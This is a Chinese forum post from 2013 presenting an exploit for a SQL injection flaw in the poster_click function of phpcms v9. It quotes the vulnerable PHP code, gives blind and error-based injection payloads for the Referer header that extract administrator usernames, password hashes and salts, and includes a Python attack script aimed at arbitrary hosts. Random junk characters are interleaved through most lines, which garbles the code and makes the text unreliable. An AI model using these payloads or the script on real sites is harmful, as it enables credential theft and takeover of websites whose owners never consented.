有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
+ }/ k: z. x- U" t
! R$ K9 O9 S4 p% f% N) C/ H( D问题函数\phpcms\modules\poster\index.php
8 C! E- G3 @2 k/ O2 B" b% A- _% g6 q; o t c; {0 ]
public function poster_click() {
: `# _1 B: m' K V- `# s$id = isset($_GET['id']) ? intval($_GET['id']) : 0;& d1 U& _0 M) l1 l
$r = $this->db->get_one(array('id'=>$id));9 i8 i) L& f w# P
if (!is_array($r) && empty($r)) return false;+ G* u0 D# k: ^$ L6 O
$ip_area = pc_base::load_sys_class('ip_area');8 b& T' v3 T2 w6 u5 u; k# f- V
$ip = ip();
9 N+ z: ~$ k) Y% k# m: e: j$area = $ip_area->get($ip);
; O+ h5 v2 v6 r, D$username = param::get_cookie('username') ? param::get_cookie('username') : '';
& Z3 ~( `5 n: l3 K( uif($id) {9 W) b* _3 R3 R' L: U0 {
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();0 U3 S7 k+ e7 ~" s/ i, P4 q. d
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));' c! H; k. K2 [, l7 b( h+ S# X/ y
}
, B) W. |% j% U! E$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));) b; k5 ~5 l& M( o
$setting = string2array($r['setting']);! Y$ |. Q5 ^2 P! s. O; F
if (count($setting)==1) {
) P4 n$ {7 u9 g- C( G ?$url = $setting['1']['linkurl'];* @; i2 m* X( @% a3 R- Q1 w
} else {( \" Z7 T+ D7 h! F* Z
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
2 j0 @/ m+ }# T+ T2 ~2 \/ }}* N/ M b4 t N( I$ L
header('Location: '.$url);
* X' a3 L: j# |+ S}
4 q# E+ r; L8 f R3 C$ ^
: I, P6 Z \: k$ y" x/ G! t7 r' [ 8 Y% M1 C# }3 _: H
' Z! p1 n* F& z, _: s& Q
利用方式:3 n) o# J3 j0 o: f# i
! e" S6 }- I2 y, l# y+ m
1、可以采用盲注入的手法:
! j' F. U+ P; l% v& C! s, @* A3 m! \2 b, b/ U* f
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#& p; C+ O' ]6 v/ k3 V5 O1 w* ~ d
! F. U. _6 g {* U* F, R- a通过返回页面,正常与否一个个猜解密码字段。4 k; J5 T8 N! C# o$ e
* h4 J2 k6 G% ^, m
2、代码是花开写的,随手附上了:
9 `, \1 Q& J/ i2 ?& g& I# n: i$ M1 ^1 O) y0 n' _* Q: ]0 i
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
( l% |4 T# w$ [3 f V6 S* {
/ Z" n6 x9 m6 m此方法是爆错注入手法,原理自查。# `4 K( ?8 G1 M. U* B9 M% J
* {, {$ V, U) u ! y7 x# G& y: O) b7 i- c
. N3 C5 @) Q) o; x# a0 Z ~# f
利用程序:
9 R' K ?8 U& s) L" B- r3 V
: K3 K7 g/ _- o' T: Y% A* I( k#!/usr/bin/env python' k2 B6 M, l7 V
import httplib,sys,re
) W( k- l0 N" i* l3 D% r% j' A. F2 \7 X" y, a: u9 p3 p* Z( j7 b
def attack():: a6 `/ w7 S& S# |, M; {$ ^
print “Code by Pax.Mac Team conqu3r!”- [# e9 x; _+ S" P: t8 ~. Z( |
print “Welcome to our zone!!!”8 K& r: v) ^+ \$ e% H) ^( | e' T
url=sys.argv[1]$ K% L/ N' N b! [
paths=sys.argv[2]
' j0 |/ h j& D) F( uconn = httplib.HTTPConnection(url)
/ {# [8 M& i5 L! M6 L1 C! T% n% r+ H1 Si_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,3 t9 F5 ~9 a1 f7 V" [: ~$ `
“Accept”: “text/plain”,% k6 d+ L9 z0 N3 C
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
! p5 h) [2 j6 D Y+ `! |conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)7 D( z' |9 \5 P% S
r1 = conn.getresponse()
4 v2 V: @2 c+ Y7 r3 }2 m& Fdatas=r1.read()' [. d4 s+ r& Z$ |1 C1 `4 V
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
8 [, B% x3 [1 u" jprint datas[0]
. N* Z! V0 o+ T; e' @9 `conn.close()( X3 J. h! z6 r$ h% `1 A7 C+ U
if __name__==”__main__”:
2 q, J1 @% Q5 Z" a2 ?, o% V7 q0 l; q1 vif len(sys.argv)<3:
! I) c% ]& C& _1 K9 oprint “Code by Pax.Mac Team conqu3r”
+ l9 ?6 P6 o* u4 dprint “Usgae:”
( X! ~; I7 Q" a. A1 bprint “ phpcmsattack.py www.paxmac.org /”
0 T& C) N/ K" C2 x1 tprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”4 b1 j, a: Q. G6 x; {" n9 ~
sys.exit(1)- P7 _, @' i5 S* ]6 D
attack()
& g' C. p- W& I) `- s- Z- E0 r u" i1 E6 }) Z8 ?/ b
|
发表于 2013-1-11 21:01:00
收藏
支持
反对